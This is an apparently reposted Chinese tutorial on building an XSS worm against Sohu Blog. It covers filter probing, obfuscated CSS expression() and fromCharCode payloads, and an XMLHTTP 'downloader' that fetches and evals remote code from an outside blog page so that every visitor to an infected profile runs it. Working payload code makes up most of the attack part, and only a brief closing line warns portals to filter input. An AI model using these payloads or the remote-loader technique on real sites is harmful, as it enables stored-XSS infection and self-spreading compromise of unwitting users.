也想出现在这里? 联系我们

完整的XSS wrom入侵实现流程

作者 : 小编 本文共1784个字,预计阅读时间需要5分钟 发布时间: 2021-06-14 共1.2K人阅读
也想出现在这里? 联系我们

我先拿SOHU BLOG做示范.

1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\\/前是真正的空格),在个人档案处看过滤了哪些.

’’;:!–"<javascript JAvaSCriPT>=&#{()} \\/

结果

’’;:!–"=&#{()} // (&后是amp,论坛过滤了)

过滤了"javascript","&"和"\\"这两个转义字符串,因此HTML转码和CSS样式转码已无效,只好从属性和事件入手.

2.测试一个XSS常用属性和两个事件,貌似没有过滤字符.
expression
onerror
onload

3.下面开始尝试构造语句.如下:

<img src="#" style="Xss:expression(alert(’xss’));">

<img src="#" onerror=alert(’xss’)>

<img src="/Article/UploadFiles/200702/20070202101404522.jpg" onload=alert(’xss’)>

构造完整标记,页面输出后又全部过滤.

4."/"字符没有过滤因此可以构造/*xxxx*/注释符,expression属性可以配合注释符构造出语句:

<div style="xss:ex/**/pre/**/ssion(alert(’xss’))">

5.由于expression属性比较特殊想当于一个死循环的EVAL函数,同时style标记里不能出现";"字符,也就是不能构造多条连接在一起的javascript,因此构造出如下语句:

<DIV STYLE="xss:ex/**/pre/**/ssion(eval(xss));" xss="var Then=new Date();Then.setTime(Then.getTime() 10*1000);if(document.cookie.indexOf(’Cookie1=’) == -1){document.cookie=’Cookie1=RAY;expires=’ Then.toGMTString();alert(’xss’);}">

//设置一个COOKIE在10秒后失效,并在这条COOKIE语句中执行其他语句或函数.

6.遗憾的是SOHU BLOG对于标记内不合适的内容都会过滤,因此我们无法eval标记内的某个变量,于是采用fromCharCode方法,将Unicode字符值专成字符串再用eval函数执行:

<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))">

7.感染流程考虑:

㈠.BLOG页面的个人档案处是页面通用的,

㈡.XSS内容写到个人档案处,所有浏览者都会触发XSS

㈢.实现一段提交XSS内容到个人档案的代码.

8.个人档案处只能输入2048个字符,又采用了fromCharCode方法,因此出现XSS代码长度的限制,因此只能调用远程代码,于是写出了个XSS downloader.

主要代码:

function d(){
a=new ActiveXObject(’Microsoft.XMLHTTP’); /*调用XMLHTTP控件
a.Open(’get’,’http://s0n9.blog.sohu.com/31406970.html’,false);/*发出一个GET提交请求
a.send();
b=a.responseText; /*将传回值赋给变量B
eval(unescape(b.substring(b.indexOf(’–|’) 3,b.indexOf(’|–’))));
/*用indexOf计算 –|********|– 的位置,用substring方法取出字符串,最后用unescape方法解码.
}d()

http://s0n9.blog.sohu.com/31406970.html 页面代码:

alert(\’xss\’);
/*利用escape将标点符号转码,由于responseText特性,某些字符会转换,如"&"字符会变成"&"(&后是amp,论坛过滤了)

PS:其他传染和详细的伪造提交的过程略去,各门户网站小心,过滤好XSS关键字,以防止XSS WROM爆发

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 完整的XSS wrom入侵实现流程

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录